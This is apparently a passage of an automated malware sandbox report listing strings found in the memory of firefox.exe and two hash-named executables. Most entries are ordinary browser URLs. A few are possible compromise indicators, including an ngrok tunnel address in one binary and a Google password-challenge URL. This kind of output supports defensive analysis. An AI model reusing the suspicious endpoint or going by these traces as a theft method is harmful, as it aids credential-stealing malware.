Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000019.00000003.2803157029.00000234956B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2834797644.00000234955F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2915309184.000002348E2E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2803157029.00000234956D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2834797644.00000234955DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809785226.000002348FB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2878220969.000002348E18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2902363183.00000234956B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2878220969.000002348E17A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2878220969.000002348E1D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A425000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2834797644.0000023495554000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2806985010.00000234956D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3027734740.000002348AC73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2915309184.000002348E2C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2800305159.00000234956E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2834797644.00000234955C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2800424280.00000234956C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2801426526.00000234956E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modu
Source: firefox.exe, 00000019.00000003.2834797644.00000234955DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000019.00000003.2834797644.00000234955DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000019.00000003.2834797644.00000234955DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000019.00000003.2809785226.000002348FBD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/schemas/devtoo
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/shopping/Shoppi
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://passwordmgr/locale/passwordmgr
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulmaybeImportLogins:
Source: firefox.exe, 00000019.00000002.2959811201.0000023489826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulpruneAttachments/
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://devtools/shared/security/Dev
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsaveBrowser
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2834797644.00000234955DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 2235d4f703.exe, 00000009.00000003.2657057539.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2787006517.0000000005B28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2834797644.00000234955DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000019.00000003.2751068754.000002348D100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2755601551.000002348D37B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754071325.000002348D320000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754638273.000002348D33E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/https://www.google.com/searchVALIDATE_ONCE_PER_SESSIONsetClosedCaptionB
Source: 2235d4f703.exe, 00000009.00000003.2602738583.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2602569883.000000000589D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733313298.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733601520.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733441529.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000019.00000003.2834797644.00000234955B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000019.00000003.2809785226.000002348FB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A425000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2929719556.000000ADEE1D8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2809217950.000002349598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000019.00000003.2809646575.000002349591A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 2235d4f703.exe, 00000009.00000003.2660788882.0000000005854000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2790096589.0000000005B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 2235d4f703.exe, 00000009.00000003.2660788882.0000000005854000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2790096589.0000000005B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000019.00000002.3027734740.000002348ACE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000019.00000002.2959811201.00000234898AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180unified-nav-forward
Source: firefox.exe, 00000019.00000003.2834797644.0000023495578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000019.00000003.2834797644.0000023495578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000019.00000003.2834797644.0000023495578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000019.00000003.2834797644.0000023495578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 2235d4f703.exe, 00000009.00000003.2602738583.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2602569883.000000000589D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733313298.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733601520.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733441529.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 2235d4f703.exe, 00000009.00000003.2602738583.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2602569883.000000000589D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733313298.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733601520.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733441529.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 2235d4f703.exe, 00000009.00000003.2602738583.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2602569883.000000000589D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733313298.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733601520.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733441529.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754638273.000002348D33E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000019.00000002.2972813755.000002348A452000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: 2235d4f703.exe, 00000009.00000003.2660788882.0000000005854000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2790096589.0000000005B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 2235d4f703.exe, 00000009.00000003.2660788882.0000000005854000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2790096589.0000000005B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000019.00000003.2809646575.000002349591E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2799950747.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000019.00000003.2803157029.000002349564E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2799950747.000002349564E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000019.00000003.2751068754.000002348D100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2755601551.000002348D37B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754071325.000002348D320000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2754638273.000002348D33E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: 2235d4f703.exe, 00000009.00000003.2602738583.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2602569883.000000000589D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733313298.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733601520.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733441529.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2235d4f703.exe, 00000009.00000003.2602738583.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2602569883.000000000589D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733313298.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733601520.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733441529.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 2235d4f703.exe, 00000009.00000003.2602738583.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 00000009.00000003.2602569883.000000000589D000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733313298.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733601520.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.2733441529.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000019.00000003.2800133061.00000234958CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000019.00000002.3022359418.000002348AB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2760224341.000002348AB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000019.00000002.3022359418.000002348AB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2760224341.000002348AB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3045686159.000002348B7C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sresource://gre/modules/PrivateBrowsingUtils.sys.mj
Source: firefox.exe, 00000019.00000002.3038902063.000002348AEF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.3021308572.000002348AAA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
